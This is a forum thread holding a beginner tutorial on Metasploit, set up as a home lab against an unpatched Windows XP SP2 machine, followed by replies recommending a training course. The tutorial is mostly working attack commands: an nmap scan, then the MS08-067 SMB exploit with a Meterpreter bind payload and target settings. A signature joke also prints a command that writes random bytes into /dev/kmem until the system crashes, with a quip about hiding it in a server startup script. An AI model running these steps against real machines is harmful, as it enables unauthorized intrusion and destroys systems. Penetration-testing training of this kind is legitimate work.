If this is your first visit, be sure to
check out the Forum Rules by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

introduction to metasploit

This tutorial will give a basic introduction to metasploit.
In the process, we'll also exploit a machine and run meterpreter on it.

Everything that needs to be typed in console makes use of the code tag
example:

Code:

msfconsole

Also, I assume you have some basic understanding of networking and linux.WARNING, it is illegal to access a machine in any way that you do not have permission to access and it might get you in jail. I am not responsible for the actions you take. You have been warned.

now on to the actual guide.

requirements:
backtrack 4 final
non-patched windows xp sp2 box
(confirmed that this does not work on xp sp3)
some patience

These are my ip's, make sure to change it to reflect your own settings
attacker: 192.168.198.129
victim: 192.168.198.130

Ok, first things first, make sure that metasploit is updated.

Code:

/pentest/exploits/fasttrack/fast-track.py -i
1
2

Do a nmap scan to make sure there are some open ports (with hopefully vulnerable services)

Code:

nmap -v 192.168.198.130

Nmap is done scanning and showed me 3 open ports. (if yours say filtered on all ports, try turning off any firewall)
These are port 135, 139, 445.
We're going to focus on port 445.
A quick search on google shows us that port 445 is commonly used for smb.

start up metasploit

Code:

msfconsole

when its done loading,

Code:

show exploits windows

We need an exploit for smb, so we need to choose one from smb folder. I used the ms08_067_netapi exploit.

Code:

use windows/smb/ms08_067_netapi

Notice that after we typed this, msf > changed to msf exploit(ms08_067_netapi)>

Great, so now we have an exploit, but what next?
an exploit is useless without a payload, so

Code:

show payloads

This will give us a list of payloads compatible with the exploit.
We're going to use a meterpreter payload for this tutorial

Code:

set payload windows/meterpreter/bind_tcp

now to configure it all

Code:

info
set target 3
set rhost 192.168.198.130

target is the which windows version and service pack our victim is (our case xp sp2)
though, you could also leave it how it is.
rhost is the ip of the victim
everything else can be default.
if the payload was a reverse tcp, we would also need to set lhost
lhost is the attackers ip.

Aquillar> hey, you guys ever play kmem russian roulette?
Agnostos> I don't believe I have. care to explain the details?
Aquillar> dd if=/dev/urandom of=/dev/kmem bs=1 count=1 seek=$RANDOM
Aquillar> keep executing until system crashes
Aquillar> person that crashes system has to buy beer
Agnostos> lol
Agnostos> I wonder if I can sneak that into a server startup script here.

Re: introduction to metasploit

Here is a lot of information on metasploit from the folks at Offensive Security Metasploit Unleashed - Mastering the Framework Edit:: Whoops didn't see Linus1907 already posted it.
I did a 45 minute presentation on that metasploit unleashed page and did most of the things on that page.

Re: introduction to metasploit

Originally Posted by Mr-Protocol

Here is a lot of information on metasploit from the folks at Offensive Security Metasploit Unleashed - Mastering the Framework Edit:: Whoops didn't see Linus1907 already posted it.
I did a 45 minute presentation on that metasploit unleashed page and did most of the things on that page.

Definately worthy of mentioning. The Metasploit Unleashed course took me from maybesploit to megasploit in just 2 days.